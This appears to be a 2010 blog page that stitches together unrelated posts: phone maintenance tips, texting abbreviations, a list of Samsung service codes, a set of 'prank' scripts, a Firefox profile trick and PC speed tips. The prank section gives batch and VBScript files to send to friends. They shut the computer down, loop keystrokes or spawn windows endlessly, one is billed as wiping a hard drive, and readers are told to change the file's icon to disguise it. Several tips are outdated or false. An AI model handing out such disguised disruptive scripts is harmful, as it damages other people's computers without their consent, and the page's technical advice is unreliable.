Friday, July 30, 2010

Tips on Mobile Maintenance

Tips on Mobile Maintenance

Looking after your mobile helps to ensure it has a long and productive life. There are 8 easy maintenance tips to help you get the best out of your mobile phone. All of the points below should also apply to your battery, charger and any other accessories.

KEEP YOUR MOBILE:

  1. Charged: Ensure your battery is fully charged, and then completely run it down before recharging. Recharging too early causes your battery to run out of power more quickly.
  2. Secure: For security reasons, enable the PIN on your SIM Card and Phone-lock on your phone to avoid unauthorized used. These security checks will also be activated when the phone is power cycled. You can check with your carrier or the phone manual for the features and also for information on blocking your SIM card and phone IMEI number if the phone is stolen. For more information please see the Security Tips located on the AMTA Lost and Stolen website.
  3. Protected: Make sure you use a keypad lock to lock your phone. Unplanned calls can cost a fortune and even though your phone may be in a safe place, such as in a bag, your phone will still get knocked around to a surprising degree. Rough treatment can damage electronic circuit boards so avoid dropping or unnecessarily shaking your phone.
  4. Battery: Be safe with your batteries. Use only genuine batteries from your phone manufacturer and only buy from authorized dealers. Going for the cheap option of a counterfeit battery can be dangerous.
  5. Clean: Don't use harsh detergents, cleaning solvents or harsh chemicals to clean your phone. Wipe only with a soft cloth.
  6. Covered: a protective cover will help repel dust and dirt, and prevent scratches. Make sure the cover you choose is of good quality. Low quality covers with no air pockets can damage you phone by creating humidity inside the cover.
  7. Storing your phone: Always store your phone in a dry place. Avoid rain, high humidity and liquids. All of these may contain minerals that could corrode the electronic circuits.
  8. At the right temperature: To ensure a long life, keep your phone in a stable temperature. Avoid exposing your phone to liquid and/or exposing your phone to extreme temperature change from hot to cold and vice versa. This might create condensation and damage the phone.
Text Messaging Abbreviations (Short Forms)
Text Messaging Abbreviations (Short Forms)
Single letters can replace words
• be becomes b
• see becomes c
• the becomes da, de or d
• okay becomes k
• are becomes r
• you becomes u
• with becomes wit or w/
• without becomes w/o
• why becomes y
• oh becomes o
Single digits can replace words
• ate becomes 8
• for becomes 4
• to or too becomes 2
• won becomes 1
A single letter or digit can replace a syllable
• ate becomes 8, so:
o great becomes gr8
o mate becomes m8
o wait becomes w8
o later becomes l8r or l8a
o skate becomes sk8
o skater becomes sk8r
• tomorrow becomes 2mro
• for or fore becomes 4, so:
o before becomes (combining both of the above) b4
o therefore becomes thr4
• once becomes 1ce
Combinations of the above can shorten a single or multiple words
• Your and You're become ur, yr, or u're
Common abbreviations


Anything - NTHING

Are you OK - RUOK?

Are - R

Ate - 8

Be - B

Before - B4

Be seeing you - BCNU

Cutie - QT

Date - D8

Dinner - DNR

Easy - EZ

Eh? - A?

Excellent - XLNT

Fate - F8

For - 4

For your information - FYI

Great - GR8

Late - L8

Later - L8R

Lots of love/laughs - Lol

Love - LUV

Mate - M8

Please - PLS

Please call me - PCM

Queue/cue - Q

Rate - R8

See/sea - C

See you later - CU L8R

Speak - SPK

Tea - T

Thanks - THX

Thank you - THNQ

To/too - 2

To be - 2B

Today - 2DAY

Tomorrow - 2MORO

Want to - WAN2

What - WOT

Work - WRK

Why - Y

You - U

------------

Happy/Smiley - :-)

Angry - :-||

Very happy - :-))

Confused - %-)

Tongue tied - :-&

Sad - :-(

Saintly - O:-)

Laughing - :-D

Crying - :'-(

Surprised/shocked - :-O

Screaming - :-@

Kiss - :-*

Pig - :@)

Clown - *:-)

Wink - ;-)

Word or phrase Abbreviation(s)
Age/Sex/Location a/s/l or asl
As soon as possible ASAP
At the moment atm
Be right back brb
By the way btw
Got to go g2g or gtg
Great gr8
I don't know idk
In my opinion imo
Just kidding jk
alots of love lol
Laughing my ass off lmao
Rolling on the floor laughing rofl
What the fuck? wtf
Talk to you later ttyl or t2yl
How to display the hidden settings of Samsung mobile phones?



Today we will discuss about the some secret codes of Samsung mobiles. These codes may be not applied to all old models of Samsung mobile, but you can try to all latest Samsung mobiles. You can display the hidden information of mobile sets and troubleshoot the routine problems using these codes.

Follow the list of latest Samsung codes list:



Code Action

*2767*3855# To Format the mobile

*#9999# Use to display the mobile software version

#*3849# Use to reboot the Samsung handsets

*#06# To display the IMEI Number of the mobile

#*2558# To on/off the mobile time

#*7337# Use to unlock the latest Samsung set

#*4760# Use to activate and deactivate the GSM features

*#9998*246# To verify the memory and battery information

*#7465625# To verify the Lock status of mobile

*#0001# To display the Serial Number of the mobile

*2767*637# Use to unlock the mobile code

*#8999*636# To display the storage capacity of the mobile

#*2562# Use to reboot the Samsung handsets

*#8999*667# Use to run the mobile in Debug mode

*2767*226372# To fine-tune the camera settings

*#8999*778# Use to display the information about mobile SIM card

*2767*637# Use to unlock the mobile code

*7465625*28638# Use to make active the Network Lock

#*#8377466# To display the hardware version

*7465625*746*Code# Use to make active the SIM card lock

*#pw+15853649247w# Use to unlock the mobile code without SIM card

#*3888# To verify the Bluetooth information

*#9998*627837793# Uses to get extra parameter for unlock mobile settings

#7465625*28638# Use to unlock the Network Lock

#*7983# Voltage Use to regulate Frequency or Voltage

#7465625*746*Code# Use to unlock the SIM card lock

#*2834# Use to reset the handsfree options

#*5376# To delete all SMS in one command

*#4777*8665# Use to explore the GPSR tool list

#*2474# To verify the charging duration

*2767*688# Use to readjust the mobile TV options

10 MOst dangerous scripts to prank your friend >>

ALL OF THEZE COMMANDZ ARE TO BE TYPED IN NOTEPAD...

--- --- --- --- --- --- --- --- ---

1) Convey your friend a lil' message and shut down his / her computer:
Type :

@echo off
msg * I don't like you
shutdown -c "Error! You are too ******!" -s

Save it as "Anything.BAT" in All Files and send it.

2) Toggle your friend's Caps Lock button simultaneously:
Type :

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

Save it as "Anything.VBS" and send it.

3) Continually pop out your friend's CD Drive. If he / she has more than one, it pops out all of them!
Type :

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Save it as "Anything.VBS" and send it.

4) Frustrate your friend by making this VBScript hit Enter simultaneously:
Type :

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Save it as "Anything.VBS" and send it.

5) Open Notepad, slowly type "Hello, how are you? I am good thanks" and freak your friend out:
Type :

WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "

Save it as "Anything.VBS" and send it.

6) Frustrate your friend by making this VBScript hit Backspace simultaneously:
Type :

MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

Save it as "Anything.VBS" and send it.

7) Hack your friend's keyboard and make him type "You are a fool" simultaneously:
Type :

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop

Save it as "Anything.VBS" and send it.

8. Open Notepad continually in your friend's computer:
Type :

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Save it as "Anything.BAT" and send it.

9) Hard prank: Pick your poison batch file. It asks your friend to choose a number between 1-5 and then does a certain action:

1: Shutdown
2: Restart
3: Wipes out your hard drive (BEWARE)
4: Net send
5: Messages then shutdown
Type :

@echo off
title The end of the world
cd C:\
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc...
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you're boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two

Save it as "Anything.BAT" and send it.

You might wanna have to change the Icon of the file before sending it to your friend, so right click the file, click Properties, click on the 'Change' Icon and change the icon from there.

Multiple Logins of Gmail and Orkut through firefox

Just follow the following steps and you will be able to login in gmail and orkut with multiple accounts. Through this you will be able to make profiles in your firefox.

Step 1:

Open system properties(by right clicking my computer), choose tab advanced, click to environment variables button. in system variables section, click new. type this http://i40.tinypic.com/14jb9j6.jpginformation to each textbox.

Step 2:

variable name: moz_no_remote (should be all small letter).

variable value: 1


Step 3:

open firefox icon's properties(from desktop and quick launch). add extension -p to command line(like "c:\program files\mozilla firefox\firefox.exe" -p). press ok.
When you will open firefox it will prompt for profile selection create a profile,open firefox login to orkut open once more use another profile login.

Top Ten Tips To Improve System Speed

1.Let your PC boot up completely before opening any applications.

2.Refresh the desktop after closing any application. This will remove any unused files from the RAM.

3.Do not set very large file size images as your wallpaper. Do not keep a wallpaper at all if your PC is low on RAM (less than 64 MB).

4.Do not clutter your Desktop with a lot of shortcuts. Each shortcut on the desktop uses up to 500 bytes of RAM

5.Empty the recycle bin regularly. The files are not really deleted from your hard drive until you empty the recycle bin.

6.Delete the temporary internet files regularly.

7.Defragment your hard drive once every two months. This will free up a lot of space on your hard drive and rearrange the files so that your applications run faster.

8.Always make two partitions in your hard drive. Install all large Softwares (like PSP, Photoshop, 3DS Max etc) in the second partition. Windows uses all the available empty space in C drive as virtual memory when your Computer RAM is full. Keep the C Drive as empty as possible.


9.When installing new Softwares disable the option of having a tray icon. The tray icons use up available RAM, and also slow down the booting of your PC. Also disable the option of starting the application automatically when the PC boots. You can disable these options later on also from the Tools or preferences menu in your application.

10. Protect your PC from dust. Dust causes the CPU cooling fan to jam and slow down thereby gradually heating your CPU and affecting the processing speed. Use compressed air to blow out any dust from the CPU. Never use vacuum.

RAM IS THE WORKING AREA (DESKTOP) OF THE CPU, KEEP IT AS EMPTY AND UNCLUTTERED AS POSSIBLE!